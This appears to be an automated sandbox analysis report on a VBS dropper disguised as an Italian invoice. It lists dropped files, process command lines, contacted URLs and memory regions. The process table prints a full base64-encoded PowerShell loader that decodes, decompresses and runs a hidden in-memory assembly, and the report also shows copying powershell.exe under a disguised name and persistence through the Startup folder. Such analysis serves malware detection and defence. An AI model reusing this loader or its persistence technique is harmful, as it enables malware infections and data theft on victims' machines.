Files
File Path
|
Type
|
Category
|
Malicious
|
|
---|---|---|---|---|
Fattura-24SC-99245969925904728562.vbs
|
ASCII text, with very long lines (65536), with no line terminators
|
initial sample
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\OSDescription.vbs
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Roaming\OSDescription.vbs
|
ASCII text, with very long lines (65536), with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\InstallUtil.exe.log
|
ASCII text, with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_05eouqb0.jr2.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2nuhi4yi.ymc.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5ch103yy.jim.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5qlkpqgk.hpo.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Roaming\OSDescription.vbs.exe
|
PE32 executable (console) Intel 80386, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Roaming\OSDescription.vbs:Zone.Identifier
|
ASCII text, with CRLF line terminators
|
modified
|
||
C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe
|
PE32 executable (console) Intel 80386, for MS Windows
|
dropped
|
Processes
Path
|
Cmdline
|
Malicious
|
|
---|---|---|---|
C:\Windows\System32\wscript.exe
|
C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs"
|
||
C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe
|
"C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe" -enc JABGAHAAdABqAHgAcgB4AGkAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAXQA6ADoARwBlAHQAQwB1AHIAcgBlAG4AdABQAHIAbwBjAGUAcwBzACgAKQAuAE0AYQBpAG4ATQBvAGQAdQBsAGUALgBGAGkAbABlAE4AYQBtAGUALgBSAGUAcABsAGEAYwBlACgAJwAuAGUAeABlACcALAAnACcAKQA7ACQATgBrAGwAcwBlAHgAdAAgAD0AIABnAGUAdAAtAGMAbwBuAHQAZQBuAHQAIAAkAEYAcAB0AGoAeAByAHgAaQAgAHwAIABTAGUAbABlAGMAdAAtAE8AYgBqAGUAYwB0ACAALQBMAGEAcwB0ACAAMQA7ACAAJABaAG8AaQBsAGUAdwBmAGMAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQATgBrAGwAcwBlAHgAdAAuAFIAZQBwAGwAYQBjAGUAKAAnAFIARQBNACAAJwAsACAAJwAnACkALgBSAGUAcABsAGEAYwBlACgAJwBAACcALAAgACcAQQAnACkAKQA7ACQAWgBwAHEAbABxAGEAegBpAGEAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ASQBPAC4ATQBlAG0AbwByAHkAUwB0AHIAZQBhAG0AKAAgACwAIAAkAFoAbwBpAGwAZQB3AGYAYwAgACkAOwAkAEQAawBtAGIAcAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBNAGUAbQBvAHIAeQBTAHQAcgBlAGEAbQA7ACQASQB2AHkAZwB5AG8AcwB2ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEcAegBpAHAAUwB0AHIAZQBhAG0AIAAkAFoAcABxAGwAcQBhAHoAaQBhACwAIAAoAFsASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAE0AbwBkAGUAXQA6ADoARABlAGMAbwBtAHAAcgBlAHMAcwApADsAJABJAHYAeQBnAHkAbwBzAHYALgBDAG8AcAB5AFQAbwAoACAAJABEAGsAbQBiAHAAIAApADsAJABJAHYAeQBnAHkAbwBzAHYALgBDAGwAbwBzAGUAKAApADsAJABaAHAAcQBsAHEAYQB6AGkAYQAuAEMAbABvAHMAZQAoACkAOwBbAGIAeQB0AGUAWwBdAF0AIAAkAFoAbwBpAGwAZQB3AGYAYwAgAD0AIAAkAEQAawBtAGIAcAAuAFQAbwBBAHIAcgBhAHkAKAApADsAWwBBAHIAcgBhAHkAXQA6ADoAUgBlAHYAZQByAHMAZQAoACQAWgBvAGkAbABlAHcAZgBjACkAOwAgACQAUABtAGsAZgBxACAAPQAgAFsAUwB5AHMAdABlAG0ALgBBAHAAcABEAG8AbQBhAGkAbgBdADoAOgBDAHUAcgByAGUAbgB0AEQAbwBtAGEAaQBuAC4ATABvAGEAZAAoACQAWgBvAGkAbABlAHcAZgBjACkAOwAgACQAWgB5AHMAeAB4AGUAeABnAHEAbwAgAD0AIAAkAFAAbQBrAGYAcQAuAEUAbgB0AHIAeQBQAG8AaQBuAHQAOwAgAFsAUwB5AHMAdABlAG0ALgBEAGUAbABlAGcAYQB0AGUAXQA6ADoAQwByAGUAYQB0AGUARABlAGwAZQBnAGEAdABlACgAWwBBAGMAdABpAG8AbgBdACwAIAAkAFoAeQBzAHgAeABlAHgAZwBxAG8ALgBEAGUAYwBsAGEAcgBpAG4AZwBUAHkAcABlACwAIAAkAFoAeQBzAHgAeABlAHgAZwBxAG8ALgBOAGEAbQBlACkALgBEAHkAbgBhAG0AaQBjAEkAbgB2AG8AawBlACgAKQAgAHwAIABPAHUAdAAtAE4AdQBsAGwA
|
||
C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
|
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
|
||
C:\Windows\System32\wscript.exe
|
"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\OSDescription.vbs"
|
||
C:\Windows\System32\wscript.exe
|
"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\OSDescription.vbs"
|
||
C:\Users\user\AppData\Roaming\OSDescription.vbs.exe
|
"C:\Users\user\AppData\Roaming\OSDescription.vbs.exe" -enc JABGAHAAdABqAHgAcgB4AGkAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAXQA6ADoARwBlAHQAQwB1AHIAcgBlAG4AdABQAHIAbwBjAGUAcwBzACgAKQAuAE0AYQBpAG4ATQBvAGQAdQBsAGUALgBGAGkAbABlAE4AYQBtAGUALgBSAGUAcABsAGEAYwBlACgAJwAuAGUAeABlACcALAAnACcAKQA7ACQATgBrAGwAcwBlAHgAdAAgAD0AIABnAGUAdAAtAGMAbwBuAHQAZQBuAHQAIAAkAEYAcAB0AGoAeAByAHgAaQAgAHwAIABTAGUAbABlAGMAdAAtAE8AYgBqAGUAYwB0ACAALQBMAGEAcwB0ACAAMQA7ACAAJABaAG8AaQBsAGUAdwBmAGMAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQATgBrAGwAcwBlAHgAdAAuAFIAZQBwAGwAYQBjAGUAKAAnAFIARQBNACAAJwAsACAAJwAnACkALgBSAGUAcABsAGEAYwBlACgAJwBAACcALAAgACcAQQAnACkAKQA7ACQAWgBwAHEAbABxAGEAegBpAGEAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ASQBPAC4ATQBlAG0AbwByAHkAUwB0AHIAZQBhAG0AKAAgACwAIAAkAFoAbwBpAGwAZQB3AGYAYwAgACkAOwAkAEQAawBtAGIAcAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBNAGUAbQBvAHIAeQBTAHQAcgBlAGEAbQA7ACQASQB2AHkAZwB5AG8AcwB2ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEcAegBpAHAAUwB0AHIAZQBhAG0AIAAkAFoAcABxAGwAcQBhAHoAaQBhACwAIAAoAFsASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAE0AbwBkAGUAXQA6ADoARABlAGMAbwBtAHAAcgBlAHMAcwApADsAJABJAHYAeQBnAHkAbwBzAHYALgBDAG8AcAB5AFQAbwAoACAAJABEAGsAbQBiAHAAIAApADsAJABJAHYAeQBnAHkAbwBzAHYALgBDAGwAbwBzAGUAKAApADsAJABaAHAAcQBsAHEAYQB6AGkAYQAuAEMAbABvAHMAZQAoACkAOwBbAGIAeQB0AGUAWwBdAF0AIAAkAFoAbwBpAGwAZQB3AGYAYwAgAD0AIAAkAEQAawBtAGIAcAAuAFQAbwBBAHIAcgBhAHkAKAApADsAWwBBAHIAcgBhAHkAXQA6ADoAUgBlAHYAZQByAHMAZQAoACQAWgBvAGkAbABlAHcAZgBjACkAOwAgACQAUABtAGsAZgBxACAAPQAgAFsAUwB5AHMAdABlAG0ALgBBAHAAcABEAG8AbQBhAGkAbgBdADoAOgBDAHUAcgByAGUAbgB0AEQAbwBtAGEAaQBuAC4ATABvAGEAZAAoACQAWgBvAGkAbABlAHcAZgBjACkAOwAgACQAWgB5AHMAeAB4AGUAeABnAHEAbwAgAD0AIAAkAFAAbQBrAGYAcQAuAEUAbgB0AHIAeQBQAG8AaQBuAHQAOwAgAFsAUwB5AHMAdABlAG0ALgBEAGUAbABlAGcAYQB0AGUAXQA6ADoAQwByAGUAYQB0AGUARABlAGwAZQBnAGEAdABlACgAWwBBAGMAdABpAG8AbgBdACwAIAAkAFoAeQBzAHgAeABlAHgAZwBxAG8ALgBEAGUAYwBsAGEAcgBpAG4AZwBUAHkAcABlACwAIAAkAFoAeQBzAHgAeABlAHgAZwBxAG8ALgBOAGEAbQBlACkALgBEAHkAbgBhAG0AaQBjAEkAbgB2AG8AawBlACgAKQAgAHwAIABPAHUAdAAtAE4AdQBsAGwA
|
||
C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
|
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
|
||
C:\Windows\System32\cmd.exe
|
cmd /c copy "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe"
/Y
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\cmd.exe
|
cmd /c copy "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "C:\Users\user\AppData\Roaming\OSDescription.vbs.exe"
/Y
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
There are 3 hidden processes, click here to show them.
URLs
Name
|
IP
|
Malicious
|
|
---|---|---|---|
https://duckduckgo.com/chrome_newtab
|
unknown
|
||
http://nuget.org/NuGet.exe
|
unknown
|
||
https://duckduckgo.com/ac/?q=
|
unknown
|
||
https://stackoverflow.com/q/14436606/23354
|
unknown
|
||
https://github.com/mgravell/protobuf-netJ
|
unknown
|
||
https://www.google.com/images/branding/product/ico/googleg_lodp.ico
|
unknown
|
||
http://pesterbdd.com/images/Pester.png
|
unknown
|
||
http://www.apache.org/licenses/LICENSE-2.0.html
|
unknown
|
||
https://contoso.com/License
|
unknown
|
||
https://discordapp.com/api/v9/users/
|
unknown
|
||
https://contoso.com/Icon
|
unknown
|
||
https://github.com/mgravell/protobuf-net
|
unknown
|
||
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
|
unknown
|
||
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
|
unknown
|
||
https://www.ecosia.org/newtab/
|
unknown
|
||
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
|
unknown
|
||
https://github.com/Pester/Pester
|
unknown
|
||
https://support.mozilla.org/products/firefox
|
unknown
|
||
https://ac.ecosia.org/autocomplete?q=
|
unknown
|
||
https://github.com/mgravell/protobuf-neti
|
unknown
|
||
http://crl.micro
|
unknown
|
||
https://aka.ms/pscore6lB
|
unknown
|
||
https://stackoverflow.com/q/11564914/23354;
|
unknown
|
||
https://stackoverflow.com/q/2152978/23354
|
unknown
|
||
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
|
unknown
|
||
https://contoso.com/
|
unknown
|
||
https://icanhazip.com/
|
unknown
|
||
https://nuget.org/nuget.exe
|
unknown
|
||
https://steamcommunity.com/profiles/
|
unknown
|
||
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
|
unknown
|
There are 21 hidden URLs, click here to show them.
Domains
Name
|
IP
|
Malicious
|
|
---|---|---|---|
90.168.9.0.in-addr.arpa
|
unknown
|
IPs
IP
|
Domain
|
Country
|
Malicious
|
|
---|---|---|---|---|
185.36.141.107
|
unknown
|
European Union
|
Memdumps
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
---|---|---|---|---|
9F60000
|
trusted library section
|
page read and write
|
||
2F6C000
|
trusted library allocation
|
page read and write
|
||
2521000
|
trusted library allocation
|
page read and write
|
||
4BC5000
|
trusted library allocation
|
page read and write
|
||
5095000
|
trusted library allocation
|
page read and write
|
||
23E0000
|
trusted library section
|
page read and write
|
||
6420000
|
trusted library allocation
|
page read and write
|
||
5CC9000
|
stack
|
page read and write
|
||
2AC58BAA000
|
heap
|
page read and write
|
||
509A000
|
trusted library allocation
|
page read and write
|
||
1A57AB9E000
|
heap
|
page read and write
|
||
1A57AAB7000
|
heap
|
page read and write
|
||
542F000
|
trusted library allocation
|
page read and write
|
||
550C000
|
trusted library allocation
|
page read and write
|
||
227FF8B4000
|
heap
|
page read and write
|
||
2AC5D025000
|
heap
|
page read and write
|
||
2C3C000
|
heap
|
page read and write
|
||
4F5F000
|
trusted library allocation
|
page read and write
|
||
83F0000
|
trusted library allocation
|
page execute and read and write
|
||
1A578DAC000
|
heap
|
page read and write
|
||
36C7000
|
trusted library allocation
|
page read and write
|
||
2AC5CED8000
|
heap
|
page read and write
|
||
562F000
|
trusted library allocation
|
page read and write
|
||
740A000
|
heap
|
page read and write
|
||
586CEFE000
|
stack
|
page read and write
|
||
63F8000
|
trusted library allocation
|
page read and write
|
||
5DCE000
|
stack
|
page read and write
|
||
1A57AB9E000
|
heap
|
page read and write
|
||
1A57AB9E000
|
heap
|
page read and write
|
||
1A57D12C000
|
heap
|
page read and write
|
||
4DD0000
|
trusted library allocation
|
page read and write
|
||
1116000
|
heap
|
page read and write
|
||
1A57D104000
|
heap
|
page read and write
|
||
2410000
|
heap
|
page read and write
|
||
4E45000
|
trusted library allocation
|
page read and write
|
||
1A57C68D000
|
heap
|
page read and write
|
||
4F31000
|
trusted library allocation
|
page read and write
|
||
1A57AAA1000
|
heap
|
page read and write
|
||
61C2000
|
trusted library allocation
|
page read and write
|
||
551F000
|
trusted library allocation
|
page read and write
|
||
42D0000
|
trusted library allocation
|
page execute and read and write
|
||
1A57AAD8000
|
heap
|
page read and write
|
||
83B0000
|
heap
|
page execute and read and write
|
||
11C9000
|
heap
|
page read and write
|
||
341A000
|
trusted library allocation
|
page read and write
|
||
1A578DAB000
|
heap
|
page read and write
|
||
8F08000
|
trusted library allocation
|
page read and write
|
||
5638000
|
trusted library allocation
|
page read and write
|
||
352000
|
unkown
|
page readonly
|
||
2AC58B30000
|
heap
|
page read and write
|
||
2360000
|
trusted library allocation
|
page read and write
|
||
6560000
|
trusted library allocation
|
page read and write
|
||
4F74000
|
heap
|
page read and write
|
||
2AC5AB2B000
|
heap
|
page read and write
|
||
2AC5D0E2000
|
heap
|
page read and write
|
||
2AC5C715000
|
heap
|
page read and write
|
||
5168000
|
trusted library allocation
|
page read and write
|
||
7FFB1C2F6000
|
unkown
|
page readonly
|
||
54EE000
|
stack
|
page read and write
|
||
73B1000
|
heap
|
page read and write
|
||
758000
|
heap
|
page read and write
|
||
27BA000
|
trusted library allocation
|
page read and write
|
||
1A57C4FD000
|
heap
|
page read and write
|
||
11D4000
|
heap
|
page read and write
|
||
1A57AB47000
|
heap
|
page read and write
|
||
5040000
|
trusted library allocation
|
page read and write
|
||
4D5E000
|
trusted library allocation
|
page read and write
|
||
4E75000
|
trusted library allocation
|
page read and write
|
||
8670000
|
trusted library allocation
|
page read and write
|
||
69EB000
|
stack
|
page read and write
|
||
1A57ABE3000
|
heap
|
page read and write
|
||
2AC5D0B0000
|
heap
|
page read and write
|
||
4F20000
|
trusted library allocation
|
page read and write
|
||
2AC5CFD8000
|
heap
|
page read and write
|
||
8400000
|
trusted library allocation
|
page read and write
|
||
5B47000
|
heap
|
page read and write
|
||
371B000
|
trusted library allocation
|
page read and write
|
||
9CF0000
|
trusted library allocation
|
page read and write
|
||
5A3D000
|
stack
|
page read and write
|
||
4E43000
|
trusted library allocation
|
page read and write
|
||
1A578CAA000
|
heap
|
page read and write
|
||
50EC000
|
trusted library allocation
|
page read and write
|
||
2AC5AAD7000
|
heap
|
page read and write
|
||
7F95000
|
trusted library allocation
|
page read and write
|
||
4CEE000
|
stack
|
page read and write
|
||
B3D35FE000
|
stack
|
page read and write
|
||
531E000
|
trusted library allocation
|
page read and write
|
||
5583000
|
trusted library allocation
|
page read and write
|
||
4F52000
|
trusted library allocation
|
page read and write
|
||
1A57D104000
|
heap
|
page read and write
|
||
1A578CA0000
|
heap
|
page read and write
|
||
485F000
|
stack
|
page read and write
|
||
2AC5D082000
|
heap
|
page read and write
|
||
2AC5CDCC000
|
heap
|
page read and write
|
||
1A57C79E000
|
heap
|
page read and write
|
||
598A000
|
stack
|
page read and write
|
||
5EFE000
|
stack
|
page read and write
|
||
2D60000
|
trusted library allocation
|
page read and write
|
||
5053000
|
trusted library allocation
|
page read and write
|
||
2AC5C771000
|
heap
|
page read and write
|
||
7270000
|
trusted library allocation
|
page read and write
|
||
1A57AB3B000
|
heap
|
page read and write
|
||
2F4F000
|
stack
|
page read and write
|
||
4D60000
|
heap
|
page execute and read and write
|
||
6B2E000
|
stack
|
page read and write
|
||
6EF0000
|
trusted library allocation
|
page read and write
|
||
69A000
|
trusted library allocation
|
page execute and read and write
|
||
2AC5C86F000
|
heap
|
page read and write
|
||
2D88000
|
trusted library allocation
|
page read and write
|
||
1A57C864000
|
heap
|
page read and write
|
||
1A578B20000
|
heap
|
page read and write
|
||
4F1C000
|
trusted library allocation
|
page read and write
|
||
2AC5AA7B000
|
heap
|
page read and write
|
||
227FFAB0000
|
heap
|
page read and write
|
||
2AC5AA8D000
|
heap
|
page read and write
|
||
3595000
|
trusted library allocation
|
page read and write
|
||
53B8000
|
trusted library allocation
|
page read and write
|
||
1A57C7DF000
|
heap
|
page read and write
|
||
2F70000
|
heap
|
page read and write
|
||
1A57AB57000
|
heap
|
page read and write
|
||
5651000
|
trusted library allocation
|
page read and write
|
||
9A80000
|
heap
|
page read and write
|
||
660000
|
heap
|
page read and write
|
||
2AC5D0D0000
|
heap
|
page read and write
|
||
750000
|
heap
|
page read and write
|
||
2AC5ABB3000
|
heap
|
page read and write
|
||
690000
|
trusted library allocation
|
page read and write
|
||
58C9000
|
trusted library allocation
|
page read and write
|
||
53D1000
|
trusted library allocation
|
page read and write
|
||
52B9000
|
trusted library allocation
|
page read and write
|
||
2F40000
|
trusted library allocation
|
page read and write
|
||
1A57AB77000
|
heap
|
page read and write
|
||
554D000
|
trusted library allocation
|
page read and write
|
||
507D000
|
trusted library allocation
|
page read and write
|
||
6570000
|
trusted library allocation
|
page execute and read and write
|
||
2AC5D01F000
|
heap
|
page read and write
|
||
2A76000
|
trusted library allocation
|
page execute and read and write
|
||
7FFB23B16000
|
unkown
|
page readonly
|
||
2AC5C51D000
|
heap
|
page read and write
|
||
2F59000
|
trusted library allocation
|
page read and write
|
||
1512000
|
trusted library allocation
|
page read and write
|
||
2AC5AA92000
|
heap
|
page read and write
|
||
8570000
|
heap
|
page read and write
|
||
4067000
|
trusted library allocation
|
page read and write
|
||
4CAE000
|
stack
|
page read and write
|
||
227FFACE000
|
heap
|
page read and write
|
||
5102000
|
trusted library allocation
|
page read and write
|
||
55E7000
|
trusted library allocation
|
page read and write
|
||
586C3FE000
|
stack
|
page read and write
|
||
1A57B1F7000
|
heap
|
page read and write
|
||
1A57D12F000
|
heap
|
page read and write
|
||
274E000
|
trusted library allocation
|
page read and write
|
||
27AE000
|
trusted library allocation
|
page read and write
|
||
77B000
|
heap
|
page read and write
|
||
82F000
|
heap
|
page read and write
|
||
646F000
|
trusted library allocation
|
page read and write
|
||
36D2000
|
trusted library allocation
|
page read and write
|
||
7FFB23B01000
|
unkown
|
page execute read
|
||
1A57C7E0000
|
heap
|
page read and write
|
||
2AC58BBB000
|
heap
|
page read and write
|
||
50F6000
|
trusted library allocation
|
page read and write
|
||
72C0000
|
trusted library allocation
|
page read and write
|
||
7FFB23B01000
|
unkown
|
page execute read
|
||
31E9000
|
trusted library allocation
|
page read and write
|
||
14E4000
|
trusted library allocation
|
page read and write
|
||
2AC5C937000
|
heap
|
page read and write
|
||
2AC5CED9000
|
heap
|
page read and write
|
||
4EA7000
|
trusted library allocation
|
page read and write
|
||
1A57D119000
|
heap
|
page read and write
|
||
2F80000
|
heap
|
page readonly
|
||
1A57AAD8000
|
heap
|
page read and write
|
||
2AC5C9C4000
|
heap
|
page read and write
|
||
1A57AB0B000
|
heap
|
page read and write
|
||
73FC000
|
heap
|
page read and write
|
||
B3D31A6000
|
stack
|
page read and write
|
||
55A0000
|
trusted library allocation
|
page read and write
|
||
1A57C8DF000
|
heap
|
page read and write
|
||
5315000
|
trusted library allocation
|
page read and write
|
||
1A57CF79000
|
heap
|
page read and write
|
||
6A2000
|
trusted library allocation
|
page read and write
|
||
52FE000
|
trusted library allocation
|
page read and write
|
||
1A57D057000
|
heap
|
page read and write
|
||
6FBD000
|
stack
|
page read and write
|
||
2AC5AB2E000
|
heap
|
page read and write
|
||
70E0000
|
trusted library allocation
|
page read and write
|
||
293F000
|
trusted library allocation
|
page read and write
|
||
1A57AB9B000
|
heap
|
page read and write
|
||
1A57C68E000
|
heap
|
page read and write
|
||
55C0000
|
trusted library allocation
|
page read and write
|
||
4D71000
|
trusted library allocation
|
page read and write
|
||
1A578D7C000
|
heap
|
page read and write
|
||
2AC5C61C000
|
heap
|
page read and write
|
||
4ECF000
|
trusted library allocation
|
page read and write
|
||
821E000
|
stack
|
page read and write
|
||
1A57AC9E000
|
heap
|
page read and write
|
||
523E000
|
stack
|
page read and write
|
||
2AC58BFE000
|
heap
|
page read and write
|
||
4DA0000
|
trusted library allocation
|
page read and write
|
||
4F37000
|
trusted library allocation
|
page read and write
|
||
1A57D132000
|
heap
|
page read and write
|
||
A340000
|
trusted library allocation
|
page execute and read and write
|
||
5AC0000
|
trusted library allocation
|
page read and write
|
||
340000
|
unkown
|
page readonly
|
||
6E1E000
|
stack
|
page read and write
|
||
2AC5ABB0000
|
heap
|
page read and write
|
||
1A57AC9E000
|
heap
|
page read and write
|
||
1A57AB9E000
|
heap
|
page read and write
|
||
1A57D08F000
|
heap
|
page read and write
|
||
5670000
|
trusted library allocation
|
page read and write
|
||
36C9000
|
trusted library allocation
|
page read and write
|
||
1A57AB9E000
|
heap
|
page read and write
|
||
5648000
|
trusted library allocation
|
page read and write
|
||
511A000
|
trusted library allocation
|
page read and write
|
||
5523000
|
trusted library allocation
|
page read and write
|
||
4F61000
|
trusted library allocation
|
page read and write
|
||
5ADC000
|
heap
|
page read and write
|
||
4D4B000
|
trusted library allocation
|
page read and write
|
||
2AC5D082000
|
heap
|
page read and write
|
||
1A578CAB000
|
heap
|
page read and write
|
||
2AC58B86000
|
heap
|
page read and write
|
||
2AC5D01F000
|
heap
|
page read and write
|
||
227FF90C000
|
heap
|
page read and write
|
||
5020000
|
heap
|
page read and write
|
||
6C60000
|
heap
|
page read and write
|
||
8550000
|
trusted library allocation
|
page read and write
|
||
1A57AB03000
|
heap
|
page read and write
|
||
2AC58BD5000
|
heap
|
page read and write
|
||
87E0000
|
trusted library allocation
|
page read and write
|
||
4DB7000
|
trusted library allocation
|
page read and write
|
||
2AC5D019000
|
heap
|
page read and write
|
||
72B0000
|
trusted library allocation
|
page read and write
|
||
2330000
|
trusted library allocation
|
page read and write
|
||
151B000
|
trusted library allocation
|
page execute and read and write
|
||
2AC5CDD9000
|
heap
|
page read and write
|
||
1A57AB9E000
|
heap
|
page read and write
|
||
2AC5C776000
|
heap
|
page read and write
|
||
4EC2000
|
trusted library allocation
|
page read and write
|
||
37A1000
|
trusted library allocation
|
page read and write
|
||
2AC5CCC7000
|
heap
|
page read and write
|
||
1A57C7FE000
|
heap
|
page read and write
|
||
2AC5AC2E000
|
heap
|
page read and write
|
||
50FC000
|
trusted library allocation
|
page read and write
|
||
478E000
|
stack
|
page read and write
|
||
73D1D000
|
unkown
|
page read and write
|
||
50E5000
|
trusted library allocation
|
page read and write
|
||
5111000
|
trusted library allocation
|
page read and write
|
||
4CFD000
|
stack
|
page read and write
|
||
6AAE000
|
stack
|
page read and write
|
||
5629000
|
trusted library allocation
|
page read and write
|
||
2AC5D019000
|
heap
|
page read and write
|
||
53DB000
|
trusted library allocation
|
page read and write
|
||
31A7000
|
trusted library allocation
|
page read and write
|
||
82C5000
|
trusted library allocation
|
page read and write
|
||
1A57D069000
|
heap
|
page read and write
|
||
1A57D12E000
|
heap
|
page read and write
|
||
564E000
|
trusted library allocation
|
page read and write
|
||
5422000
|
trusted library allocation
|
page read and write
|
||
691F000
|
stack
|
page read and write
|
||
5152000
|
trusted library allocation
|
page read and write
|
||
14F0000
|
trusted library allocation
|
page read and write
|
||
475E000
|
stack
|
page read and write
|
||
A030000
|
trusted library allocation
|
page execute and read and write
|
||
1A57C525000
|
heap
|
page read and write
|
||
52AB000
|
trusted library allocation
|
page read and write
|
||
2AC5BD81000
|
heap
|
page read and write
|
||
54BF000
|
trusted library allocation
|
page read and write
|
||
5150000
|
trusted library allocation
|
page read and write
|
||
2AC5B8C8000
|
heap
|
page read and write
|
||
516A000
|
trusted library allocation
|
page read and write
|
||
1A57C6DE000
|
heap
|
page read and write
|
||
1A57D10C000
|
heap
|
page read and write
|
||
1A57AB9E000
|
heap
|
page read and write
|
||
1A57AAE3000
|
heap
|
page read and write
|
||
52CA000
|
trusted library allocation
|
page read and write
|
||
1A57AAF7000
|
heap
|
page read and write
|
||
7800000
|
trusted library allocation
|
page read and write
|
||
2AC5C870000
|
heap
|
page read and write
|
||
1A57B6C3000
|
heap
|
page read and write
|
||
5579000
|
trusted library allocation
|
page read and write
|
||
2D30000
|
heap
|
page read and write
|
||
557B000
|
trusted library allocation
|
page read and write
|
||
535E000
|
trusted library allocation
|
page read and write
|
||
2AC5C4C8000
|
heap
|
page read and write
|
||
1A57D065000
|
heap
|
page read and write
|
||
55C6000
|
trusted library allocation
|
page read and write
|
||
1A57AB9E000
|
heap
|
page read and write
|
||
400000
|
remote allocation
|
page execute and read and write
|
||
4EFE000
|
stack
|
page read and write
|
||
2AC5CFE2000
|
heap
|
page read and write
|
||
1A578CA5000
|
heap
|
page read and write
|
||
2AC58B89000
|
heap
|
page read and write
|
||
4E94000
|
trusted library allocation
|
page read and write
|
||
2AC5BF87000
|
heap
|
page read and write
|
||
2AC5C96E000
|
heap
|
page read and write
|
||
2E20000
|
heap
|
page read and write
|
||
4E79000
|
trusted library allocation
|
page read and write
|
||
5B16000
|
heap
|
page read and write
|
||
7398000
|
heap
|
page read and write
|
||
3720000
|
trusted library allocation
|
page read and write
|
||
7080000
|
heap
|
page read and write
|
||
2AC58BAC000
|
heap
|
page read and write
|
||
1A57C58E000
|
heap
|
page read and write
|
||
1A57D083000
|
heap
|
page read and write
|
||
2AC5C5C5000
|
heap
|
page read and write
|
||
580D000
|
stack
|
page read and write
|
||
7F3E0000
|
trusted library allocation
|
page execute and read and write
|
||
722B000
|
stack
|
page read and write
|
||
703E000
|
stack
|
page read and write
|
||
1A7000
|
stack
|
page read and write
|
||
1A57CDA0000
|
heap
|
page read and write
|
||
557D000
|
trusted library allocation
|
page read and write
|
||
8560000
|
heap
|
page read and write
|
||
3439000
|
trusted library allocation
|
page read and write
|
||
4E60000
|
trusted library allocation
|
page read and write
|
||
6750000
|
trusted library allocation
|
page execute and read and write
|
||
814000
|
heap
|
page read and write
|
||
2AC5D0D2000
|
heap
|
page read and write
|
||
2AC58D85000
|
heap
|
page read and write
|
||
2A60000
|
trusted library allocation
|
page read and write
|
||
F16C9FE000
|
stack
|
page read and write
|
||
AB000
|
stack
|
page read and write
|
||
1A57D0CA000
|
heap
|
page read and write
|
||
